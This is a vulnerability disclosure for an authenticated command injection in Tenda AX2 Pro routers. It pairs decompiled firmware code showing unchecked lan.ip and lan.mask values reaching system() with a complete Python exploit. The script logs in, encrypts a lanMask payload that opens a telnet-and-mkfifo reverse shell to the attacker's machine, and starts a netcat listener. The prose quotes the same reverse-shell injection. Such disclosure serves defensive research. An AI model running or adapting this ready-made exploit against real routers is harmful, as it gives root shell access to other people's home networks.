[toc]
https://www.tenda.com.cn/default.html
- AX2 Pro
- WIFI6L Pro
- AX2L Pro
[RCE] Remote Command Execution (Authorized)
A command execution vulnerability exists in the AX2 Pro home router produced by Shenzhen Tenda Technology Co., Ltd. (Jixiang Tenda). An attacker can exploit this vulnerability by constructing a malicious payload to execute commands and further obtain shell access to the router's file system with the highest privileges.
Make Your Life Simpler:
The vulnerability exists within the device's file system, specifically in the libgo.so
shared library. More precisely, it is located in the formLanCfgSet
function of this dynamic library. The key vulnerability location, after omitting some details, is as follows:
int __fastcall formLanCfgSet(int a1, int a2, int a3)
{
puts("formLanCfgSet");
v7 = 0;
memset(v20, 0, sizeof(v20));
memset(orig_lanip, 0, sizeof(orig_lanip));
memset(orig_lan_mask, 0, sizeof(orig_lan_mask));
v17[0] = 0;
v17[1] = 0;
memset(&lanIP, 0, 0x28u);
lanIP = (char *)websGetJsonVar(a2, "lanIP", (int)"192.168.0.1");
lanMask = websGetJsonVar(a2, "lanMask", (int)"255.255.255.0");
dhcpLeaseTime = websGetJsonVar(a2, "dhcpLeaseTime", (int)&unk_B1EE4);
startIP = websGetJsonVar(a2, "startIP", (int)"192.168.0.100");
endIP = websGetJsonVar(a2, "endIP", (int)"192.168.0.200");
lanDns1 = websGetJsonVar(a2, "lanDns1", (int)&unk_B1EE4);
lanDns2 = websGetJsonVar(a2, "lanDns2", (int)&unk_B1EE4);
dhcpEn = websGetJsonVar(a2, "dhcpEn", (int)"0");
lanDnsEn = websGetJsonVar(a2, "lanDnsEn", (int)"1");
GetValue("lan.ip", orig_lanip);
GetValue("lan.mask", orig_lan_mask);
GetValue("dhcps.en", v17);
//****//
SetValue("lan.ip", lanIP);
SetValue("lan.mask", lanMask);
//****//
}
It is evident that for the lan.ip
and lan.mask
fields passed in by the Client, the corresponding CGI function does not verify the reliability of the parameters and directly calls SetValue
to set these fields. Correspondingly, upon rebooting the device, the netctrl
binary program in the file system will invoke the following function (with unrelated code omitted). In firmware version V16.03.29.50, the call chain is main--->sub_40E710--->sub_40ABD0--->doSystemCmd--->system
:
int sub_40ABD0()
{
GetValue("lan.mask", v14);
if ( !v14[0] )
strcpy(v14, "255.255.255.0");
GetValue("lan.ip", v13);
v4 = get_eth_name(0);
doSystemCmd("ifconfig %s down", v4);
v5 = get_eth_name(0);
doSystemCmd("ifconfig %s up", v5);
if ( LOBYTE(v13[0]) )
{
v6 = get_eth_name(0);
doSystemCmd("ifconfig %s %s netmask %s ", v6, v13, v14);
}
}
As shown above, for the lan.ip
and lan.mask
fields, when they are called through doSystemCmd
, no command injection check is performed on their values. The implementation of doSystemCmd
is as follows:
int doSystemCmd(char *a1, ...)
{
int v2; // [sp+20h] [+20h]
_DWORD v3[512]; // [sp+28h] [+28h] BYREF
int vars0; // [sp+828h] [+828h]
int vars4; // [sp+82Ch] [+82Ch]
void *v7; // [sp+834h] [+834h] BYREF
int v8; // [sp+838h] [+838h]
int v9; // [sp+83Ch] [+83Ch]
va_list va1; // [sp+840h] [+840h] BYREF
va_list va; // [sp+834h] [+834h]
va_start(va1, a1);
va_start(va, a1);
v3[0x1FF] = va_arg(va, _DWORD);
vars0 = va_arg(va, _DWORD);
vars4 = va_arg(va, _DWORD);
va_arg(va, _DWORD);
va_copy(va1, va);
va_arg(va1, _DWORD);
va_arg(va1, _DWORD);
va_arg(va1, _DWORD);
v7 = (void *)v3[0x1FF];
v8 = vars0;
v9 = vars4;
memset(v3, 0, sizeof(v3));
log_debug_print("doSystemCmd", 0x4B, 0, "common_so");
vsnprintf(v3, 0x800, a1, va);
v2 = system(v3);
log_debug_print("doSystemCmd", 0x51, 0, "common_so");
return v2;
}
For the parameters passed in, doSystemCmd
also does not perform any validation; instead, it simply formats the string and passes it to system
for command execution. Therefore, an attacker can manipulate the value of the lan.ip
field passed by the client to something like: 255.255.255.0;mkfifo /var/a;sleep 7;telnet 192.168.0.38 4444 0</var/a | sh 1>/var/a
. When the router reboots, it will execute the command and establish a reverse shell to a specified IP and port. For a detailed exploitation process, please refer to the demonstration video.
The HTTP requests in earlier firmware system versions may differ from those in firmware version V16.03.29.50
. This script has been tested on the V16.03.29.50
firmware.
import requests
import logging
import argparse
import hashlib
import time
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
import base64
import json
import subprocess
import threading
# nc64.exe -lvnp 4444 -s 192.168.0.38
proxy = False
proxies = {
'http': "127.0.0.1:8080",
'https': "127.0.0.1:8080"
} if proxy else None
__author__ = "Yaxuan Wang(Sw1ndl3r)"
__email__ = "2532775668@qq.com"
logging.basicConfig(level=logging.DEBUG)
global_stok = None
global_sign = None
global_iv = "EU5H62G9ICGRNI43"
def get_current_timestamp():
return str(int(time.time()))
def aes_cbc_pkcs7_encrypt(data, key_utf8, iv_utf8):
key = key_utf8.encode('utf-8')
iv = iv_utf8.encode('utf-8')
cipher = AES.new(key, AES.MODE_CBC, iv)
padded_data = pad(data, AES.block_size)
encrypted_data = base64.b64encode(cipher.encrypt(padded_data))
return encrypted_data
def aes_cbc_pkcs7_decrypt(encrypted_data, key_utf8, iv_utf8):
key = key_utf8.encode('utf-8')
iv = iv_utf8.encode('utf-8')
encrypted_data = base64.b64decode(encrypted_data)
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted_data = cipher.decrypt(encrypted_data)
unpadded_data = unpad(decrypted_data, AES.block_size)
return unpadded_data
def hash_password(password):
hashed = hashlib.md5(password.encode()).hexdigest().upper()
return hashed
def send_login_request(session, host_ip, username, password, proxies=None):
url = f"http://{host_ip}/login/Auth"
headers = {
"Host": host_ip,
"Content-Length": "66",
"Accept": "application/json, text/plain, */*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
"Content-Type": "application/json; charset=UTF-8",
"Origin": f"http://{host_ip}",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
}
payload = {
"userName": username,
"password": password
}
response = session.post(url, headers=headers, data=json.dumps(payload), proxies=proxies)
return response
def send_stokCfg_request(session, host_ip):
url = f"http://{host_ip}/goform/stokCfg?0.481083665320881"
headers = {
"Host": host_ip,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"X-Requested-With": "XMLHttpRequest",
"Connection": "close",
"Referer": f"http://{host_ip}/main.html",
"Pragma": "no-cache",
"Cache-Control": "no-cache"
}
response = session.get(url, headers=headers)
if response.status_code == 200:
logging.debug(f"GET Request successful. Response: {response.text}")
try:
json_response = response.json()
if 'stokCfg' in json_response:
global global_stok, global_sign
stok_cfg = json_response['stokCfg']
global_stok = stok_cfg.get('stok')
global_sign = stok_cfg.get('sign')
logging.info(f"Extracted stok: {global_stok}, sign: {global_sign}")
else:
logging.error("Response format error: 'stokCfg' field not found.")
except ValueError as ve:
logging.error(f"Error decoding JSON response: {ve}")
else:
logging.error(f"GET Request failed with status code: {response.status_code}")
logging.error(f"Response: {response.text}")
def send_system_reboot_request(session, host_ip, encrypted_data):
url = f"http://{host_ip}/;stok={global_stok}/goform/setModules?modules=systemReboot"
headers = {
"Host": host_ip,
"Content-Length": str(len(encrypted_data)),
"Accept": "application/json, text/plain, */*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
"Content-Type": "application/json; charset=UTF-8",
"Origin": f"http://{host_ip}",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
#"Cookie": "bLanguage=cn; _:USERNAME:_=0eac5589ffc2e90d0948bc881c5bafde",
"Connection": "close"
}
payload = {
"data": encrypted_data.decode('utf-8')
}
response = session.post(url, headers=headers, data=json.dumps(payload),proxies=proxies)
if response.status_code == 200:
logging.info("POST Request to system reboot sent successfully.")
logging.debug(f"Response: {aes_cbc_pkcs7_decrypt(json.loads(response.text).get('data'), global_sign, global_iv).decode('utf-8')}")
else:
logging.error(f"POST Request failed with status code: {response.status_code}")
logging.error(f"Response: {response.text}")
def send_set_device_info_request(session, host_ip, encrypted_data, global_stok):
url = f"http://{host_ip}/;stok={global_stok}/goform/setModules?modules=setDeviceInfo"
headers = {
"Host": host_ip,
"Content-Length": str(len(encrypted_data)),
"Accept": "application/json, text/plain, */*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
"Content-Type": "application/json; charset=UTF-8",
"Origin": f"http://{host_ip}",
"Referer": f"http://{host_ip}/index.html",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
#"Cookie": "bLanguage=cn; _:USERNAME:_=5fd7c83d72a701c0efd1b5f8851a78d3",
"Connection": "close"
}
payload = {
"data": encrypted_data.decode('utf-8')
}
response = session.post(url, headers=headers, data=json.dumps(payload))
if response.status_code == 200:
logging.info("POST Request to set device info sent successfully.")
logging.debug(f"Response: {aes_cbc_pkcs7_decrypt(json.loads(response.text).get('data'), global_sign, global_iv).decode('utf-8')}")
else:
logging.error(f"POST Request failed with status code: {response.status_code}")
logging.error(f"Response: {response.text}")
def send_formLanCfgSet(session, host_ip, encrypted_data, global_stok):
url = f"http://{host_ip}/;stok={global_stok}/goform/setModules?modules=lanCfg"
headers = {
"Host": host_ip,
"Content-Length": str(len(encrypted_data)),
"Accept": "application/json, text/plain, */*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
"Content-Type": "application/json; charset=UTF-8",
"Origin": f"http://{host_ip}",
"Referer": f"http://{host_ip}/index.html",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
#"Cookie": "bLanguage=cn; _:USERNAME:_=5fd7c83d72a701c0efd1b5f8851a78d3",
"Connection": "close"
}
payload = {
"data": encrypted_data.decode('utf-8')
}
response = session.post(url, headers=headers, data=json.dumps(payload))
if response.status_code == 200:
logging.info("POST Request to set device info sent successfully.")
logging.debug(f"Response: {aes_cbc_pkcs7_decrypt(json.loads(response.text).get('data'), global_sign, global_iv).decode('utf-8')}")
else:
logging.error(f"POST Request failed with status code: {response.status_code}")
logging.error(f"Response: {response.text}")
def attach(password,host,username,local_ip,port):
session = requests.session()
hashed_password = hash_password(password)
logging.info(f"hased_password:{hashed_password}")
response = send_login_request(session, host, username, hashed_password)
if response.status_code == 200:
logging.info("Login request sent successfully.")
time.sleep(3)
send_stokCfg_request(session, host)
data ={
"lanCfg":{
"lanIP":"192.168.0.1",
"lanMask":f"255.255.255.0;mkfifo /var/a;sleep 7;telnet {local_ip} {port} 0</var/a | sh 1>/var/a 2>&1;",
"lanDnsEn":"1",
"lanDns1":"8.8.8.8",
"lanDns2":"114.114.114.114",
"dhcpEn":"1"
}
}
data = json.dumps(data).encode()
encrypted_data_static = aes_cbc_pkcs7_encrypt(data, global_sign, global_iv)
send_formLanCfgSet(session, host, encrypted_data_static,global_stok)
logging.info("The command execution payload has been sent. For testing purposes, you need to manually restart the router.")
logging.info("Router will be hijacked after reboot, waiting...")
else:
logging.error("Failed to send login request.")
logging.error(f"Status code: {response.status_code}")
logging.error(f"Response: {response.text}")
def main():
parser = argparse.ArgumentParser(description='"Tenda router command execution vulnerability exploit"')
parser.add_argument('-H', '--host', metavar='host', default='192.168.0.1', help='Router IP address.')
parser.add_argument('-U', '--username', metavar='Username', required=True, help='Login username.')
parser.add_argument('-P', '--password', metavar='Password', required=True, help='Login password.')
parser.add_argument('-L', '--local-ip', metavar='Local IP', required=True, help='IP address assigned to the local machine by the router.')
parser.add_argument('-p', '--port', metavar='Port', type=int, required=True, help='Port number that the local machine is listening on.')
args = parser.parse_args()
logging.info(f'Author: {__author__}, email: {__email__}')
logging.info(f'Host IP: {args.host}')
attack_thread = threading.Thread(target=attach, args=(args.password, args.host,args.username,args.local_ip,args.port))
attack_thread.start()
logging.info(f'Netcat start listening on port {args.port}.')
result = subprocess.run(f'nc -lvnp {args.port} -s {args.local_ip}', shell=True)
if result.returncode == 0:
logging.info("Done")
else:
logging.error("Command execution failed.")
if __name__ == "__main__":
main()